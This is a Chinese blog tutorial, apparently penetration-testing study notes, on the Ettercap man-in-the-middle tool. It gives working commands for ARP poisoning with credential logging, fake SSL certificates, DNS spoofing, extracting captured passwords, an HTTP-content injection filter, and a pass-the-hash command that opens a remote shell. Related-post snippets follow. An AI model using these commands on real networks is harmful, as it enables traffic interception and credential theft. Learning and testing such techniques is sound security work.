中间人攻击_Ettercap

最新推荐文章于 2025-06-19 10:03:39 发布
最新推荐文章于 2025-06-19 10:03:39 发布
阅读量966 收藏 3
点赞数
CC 4.0 BY-SA版权
分类专栏: kali_linux渗透测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42952508/article/details/126985402
本文介绍Ettercap工具的功能及使用方法,包括中间人攻击、DNS欺骗等技术手段,并探讨了SSL中间人攻击及密码破解技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Ettercap

  • 统一的中间人攻击工具

  • 转发MAC与本机相同,但IP与本机不同的数据包

  • 支持SSH1\SSL中间人攻击

模块划分

  • Snifer

  • MITM

  • Filter

  • Log

  • Plugin

Snifer

  • 负责数据包转发

  • Unified

  • 单网卡情况下独立完成三层包转发

  • 始终禁用内核IP_Forward功能

  • Bridge

  • 双网卡情况下的一层MITM模式

  • 可作为IPS过滤数据包

  • 不可在网关上使用(透明网桥)

MITM

  • 把流量重定向到ettercap主机上

  • 可以使用其他工具实现MITM,ettercap只做嗅探和过滤使用

实现MITM的方法

  • ARP

  • ICMP

  • ICMP路由重定向,半双工

  • DHCP

  • 修改网关地址,半双工

  • Switch Port Straling

  • flood目标地址是本机,源地址是受害者的包

  • 适用于ARP静态绑定的环境

  • NDP

  • IPv6协议欺骗技术

  • 2.4以上内核对ARP地址欺骗的约束

  • 收到非请求的ARP相应包,不更新本地ARP缓存

  • Errercap使用ARP request包进行攻击

  • Solaris不根据ARP包更新本地ARP缓存

  • Ettercap使用先发ICMP包来更新ARP缓存

用户操作界面

-T      文本界面-G      图形界面-C      基于文本的图形界面-D      后台模式

图片

  • 指定目标

  • IPv4:MAC/IPs/Ports

  • IPv6:MAC/IPs/Ports

  • /10.0.0.1-5;10.0.0.1.33/20-25,80,110

权限配置

  • 首先修改配置,默认情况下,ettercap是以nobody的用户去运行的,

图片

  • 为了使用上不出问题,我们将其修改为root用户

图片

基于伪造证书的SSL MITIM

  • Bridge模式不支持SSL MITIM
openssl genrsa -out etter.ssl.crt 1024openssl req -new-keyetter.ssl.crt -out tmp.csropenssl x509 -req -days 1825 -in tmp.csr -signkey etter.ssl.crt -out tmp.newcat tmp.new>>etter.ssl.crtrm -f tmp.newtmp.csr

字符模式

ettercap -i eth0 -T -M arp -q /192.168.1.1// /192.168.1.2// -P autoadd -w a.cap -l loginfo -L logall -m message

之后1.2上面的数据就会被截获

图片

SSL MITM

将配置文件中这两个注释给去掉,才能抓取到加密流量

图片

DNS欺骗

  • dns_spoof插件配置文件

  • vi /etc/ettercap/etter.dns

图片

Ettercap日志查看

  • etterlog -p log.eci #查看获取的密码

  • etterlog -c log.ecp #例如Log中的连接

  • etterlog -c -f /1.1.1.1// log.ecp

  • etterlog -B -n -s -F TCP:1.1.1.1:20:1.1.1.2:1234 log.ecp > aa #选择相应的连接并榨取文件

过滤Filter

/usr/share/ettercap

图片

  • 例如 etter.filter.ssh这个过滤器就是来过滤SSH的账号密码的

  • 使用这个过滤器是要先进行编译

etterfilter etter.filter.ssh -o ssh.ef

之后加-F参数就可以了

替换HTTP内容

if (ip.proto == TCP && tcp.src == 80){msg("data on TCP 80\n");replace(" img src=","img src=\"http://1.1.1.1/1.gif\" ");replace("IMG src=", "img src=\"http://1.1.1.1/1.gif\"");replace("IMG SRC=". "img src=\"http://1.1.1.1/1.gif\" ");}
基于ICMP
-M icmp:00:11:22:33:44/10.0.0.1  (真实的网关MAC/IP)
DHCP
-M dhcp:192.168.0.30,35,50-60/255.255.255.0/192.168.0.1(DNS)
Port
-M port /1.1.1.1// /1.1.1.2//
NDP
-M ndp //xxxx::xxxx:xxxx:xxxx:xxxx/ //xxxx:xxx:x:x/

Pass the Hash(PTH)

  • 密码破解耗费时间资源巨大

  • 使用密文提交给服务器直接完成身份认证

  • NTLM/LM是没有加盐的静态HASH密文

  • 企业中使用ghost等工具来克隆安装系统

pth-winexe -U w7%aad3b435b51404eeaad3b435b51404ee:ed1bfaeb3063716ab7fe2a11faf126d8 //1.1.1.1 cmd
ettercap 中间人攻击
qq_46804551的博客
04-29 1047
ettercap ettercap是linux下 一个强大的欺骗工具,当然windows也能用 是一个统一的中间人攻击工具 转发 MAC 与本机相同,但 IP 与本机不同的数据包 支持 SSH1、SSL 中间人攻击 ettercap支持图形化操作和命令行操作。 下面我就演示图形化操作抓取目标机浏览的图片 启动ettercap ettercap -G 将目标机和网关分别添加到Target1和Target2 然后点击小圆圈,选择arp posisoning 点击OK 接下来在新的终端中输入 drif
Ettercap中间人攻击使用
二十四桥明月夜
05-02 1574
1、在kali中输入:ettercap -G 打开 最新版本的Ettercap,并选择eth0,进行sniffing 2、右上角多选按钮,选择Targets > current targets,去嗅探当前网络的主机 3、右上角多选按钮,选择Hosts > Hosts List , 展示当前网络的主机列表 4、添加攻击的目标 网段下的所有主机作为Target1,网关作为Target2 5、进行右上角的标志,点击ARP poisoning 攻击 6、查看kail的物理地址,...
Ettercap中间人攻击
Jian Sun_的博客
05-21 486
Ettercap中间人攻击 1.前期准备 安装Ettercap 2.ARP毒化内网 a.Ettercap -G 启动ettercap的GUI界面 b.绑定网卡 sniff-》Unified sniffing-》你需要监听的网卡 c.扫描内网主机 Hosts-》Scan for hosts 等待扫描结束后,Hosts->hostlist 列出扫描结果 把网关加入到Target1,把目标机加入到Target2 d.Arp内网毒化 mitm-》arp poisoning->sn
安全 渗透不容错过!这个工具有点东西!
最新发布
喜欢Python编程的程序员柚柚呀
06-19 992
EtterCap是一个基于ARP地址欺骗方式的网络嗅探工具,主要适用于交换局域网络。借助于EtterCap嗅探软件,渗透测试人员可以检测网络内明文数据通讯的安全性,及时采取措施,避免敏感的用户名/密码等数据以明文的方式进行传输。Ettercap几乎是每个渗透测试人员必备的工具之一。
ettercap 实施中间人攻击
CSDN
12-21 8733
中间人攻击(Man-in-the-MiddleAttack 简称"MITM攻击")中间人攻击很早就成为了黑客常用的一种古老的攻击手段,并且一直到如今还具有极大的扩展空间,在网络安全方面,MITM攻击的使用是很广泛的,曾经猖獗一时的SMB会话劫持、DNS欺骗等技术都是典型的MITM攻击手段.在黑客技术越来越多的运用于以获取经济利益为目标的情况下时,MITM攻击成为对网银、网游、网上交易等最有威胁并且最具破坏性的一种攻击方式,
Ettercap 实施中间人攻击
CSDN
04-01 6371
中间人攻击(MITM)该攻击很早就成为了黑客常用的一种古老的攻击手段,并且一直到如今还具有极大的扩展空间,MITM攻击的使用是很广泛的,曾经猖獗一时的SMB会话劫持、DNS欺骗等技术都是典型的MITM攻击手段.在黑客技术越来越多的运用于以获取经济利益为目标的情况下时,MITM攻击成为对网银、网游、网上交易等最有威胁并且最具破坏性的一种攻击方式.
中间人攻击——ettercap的使用
m0_57069925的博客
06-09 2786
前言:改文章仅可用于学习,不可以用于真实环境。一.背景 中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为“中间人”。 在网络安全方面,MITM攻击的使用是很广泛的,曾经猖獗一时的SMB会话劫持、DNS欺骗等技术都是典型的MITM攻击手段。在黑客技术越来越多的运用于以获取经济利益为目标的情况下时,MITM攻击成为对网银、网游
mininet_sshmitm:这是使用Mininet和Ettercap的SSH中间人(MITM)攻击的示例
05-07
在此演示中,我们将演示恶意攻击者如何通过称为ARP欺骗的方法窃听SSH客户端和SSH服务器之间的流量,从而成为中间人主机。 入门 此示例需要两个至关重要的软件,分别称为Mininet和Ettercap。 我们将在下面介绍如何...
kali利用Ettercap实现中间人攻击,钓鱼网站设置详细流程及原理
风云小虾米的博客
02-01 4954
ARP欺骗和DNS欺骗一、理论简介1、ARP欺骗2、DNS欺骗二、中间人攻击1、ARP欺骗与攻击2、DNS欺骗与钓鱼网站 一、理论简介 1、ARP欺骗   ARP协议的作用是知道IP可以找到对应的MAC地址(具体:发送ARP广播包,寻址目的MAC,目的PC,收到广播包后,发送ARP单播应答)。   ARP缓存中的信息,以后收到的信息为准,所以攻击者伪装成目标PC,一直发送ARP应答,最后发送ARP广播包的PC的ARP缓存中的目的PC的MAC地址就是攻击者PC的MAC地址,将传送给目的PC的数据,发送给了攻击
中间人攻击 ettercap
iteye_3978的博客
01-02 270
初次,修改配置 1、vi /etc/ettercap/etter.conf     ec_uid,ec_gid改为0,   再找到linux分类下的 if you use iptables 去掉注释 2、vi /etc/NetworkManager/NetworkManager.conf    managed=true 3、重启 service network-manager rest...
ettercap-开源
05-01
Ettercap是用于交换局域网的多功能嗅探器/拦截器/记录器。 它支持许多协议(甚至是加密协议)的主动和被动剖析,并包括许多用于网络和主机分析的功能。 开发已移至GitHub,https://github.com/Ettercap/ettercap
Ettercap中间人攻击——DNS劫持、替换网页内容与ARP欺骗
热门推荐
Mr_Wanderer的博客
08-13 1万+
文章目录Ettercap简介常用指令DNS劫持设置kali机攻击靶机靶机反应更换靶机访问页面的内容Ettercap替换网页内容编写过滤器发现靶机加载过滤器并开始攻击靶机反应ARP劫持监控靶机访问内容发现主机加载插件并开始攻击自动加载靶机图片靶机反应写在最后 Ettercap 简介 Ettercap是一个综合性的中间人攻击工具,使用它可以进行ARP欺骗、拦截器、DNS欺骗等常见的中间人攻击。 常用指令 1.用户界面类型 -T, –text 使用只显
中间人攻击ettercap嗅探
weixin_30655219的博客
03-25 365
中间人攻击中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为“中间人”。 Ettercap简介: Ettercap is a comprehensive suite for man in...
中间人攻击工具ettercap
weixin_33811539的博客
12-07 559
中间人攻击工具ettercap (一).简介 (二).模块划分 1.Snifer 2.MITM 3.Filter 4.Log 5.Plugin (三).特性 (四).用户操作界面 (五).指定目标 (六)权限 (七)基于伪造证书的SSL MITIM (八).ARP 中间人攻击 (九).Ettercap 日志查看 (十).Filter (十一).替换HTTP内...
ettercap,shank和bettercap利用BeEF进行中间人攻击(1)
从来不在调
03-04 2514
**一 利用ettercap 进行攻击** 首先演示一下ettercap进行ARP欺骗和DNS欺骗 我先用etterca监视我整个内网中存活的机器。如图 打开我的另外一台win7虚拟机上网,在ettercap监控台敲击空格键发现目标(如图) 太乱了吧 你可以设置ettercap 进行流量过滤 只看你感兴趣的 .接下来我们就利用ettercap的注入功能,他的注入功能有两种。一种是自带的
Etter-cap
m0_57836225的博客
08-27 836
请注意,使用 ettercap 进行攻击是非法行为,只能在合法的安全测试和研究环境中使用,并确保获得了相应的授权。需要注意的是,ettercap 是一个强大的网络攻击工具,只能在合法的授权和测试环境中使用。- 通过发送伪造的 ARP 数据包,欺骗目标主机和网关,使它们将数据包发送到攻击者的计算机上。- 在通信双方建立连接后,ettercap 可以劫持会话,插入自己的数据包或修改现有数据包。- 对捕获的数据包进行协议分析,识别出不同的网络协议,如 HTTP、FTP、SMTP 等。
ettercap ARP攻击
weixin_49071539的博客
01-13 779
1. 在/etc/sysctl.conf的配置文件中,修改变量net.ipv4.ip_forward的值为 1,把前面的 # 去掉;若此变量没有,那就添加, net.ipv4.ip_forward=1 2. 下载ettercap apt-get install ettercap 使用图像界面ettercap -G 3. ettercap -G 启动 sniffing at startup 开启 primary interface 选择wlan0 点击右上角√ 4. 开始ARP中间
Ettercap关于中间人MITM攻击的一些扩展
abraham76的博客
04-18 943
引言 Ettercap这款工具相信大家不陌生。利用Ettercap实施中间人攻击在网上有很多教程,但都将的不全面,只说怎么做,但没说前提,在什么环境下。 简介 Ettercap是一个综合性的中间人攻击工具,使用它可以进行ARP欺骗、拦截器、DNS欺骗等操作。借助于Ettercap嗅探软件,渗透测试人员可以检测网络内明文数据通讯的安全性,及时采取措施,避免敏感的用户名/密码等数据以明文的方式进行传输。Ettercap几乎是每个渗透测试人员必备的工具之一。 该款工具的图形版界面如下: 在指定环境下工作 Ett
ettercap windows版:深入理解中间人攻击和DNS ARP欺骗
ettercap是一个在Unix-like操作系统上运行的著名的中间人攻击工具,主要用于局域网内的各种攻击,包括ARP欺骗、DNS欺骗以及SSL/TLS会话劫持等。然而,当前提及的是ettercap的Windows版,这表明存在一个适用于微软...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值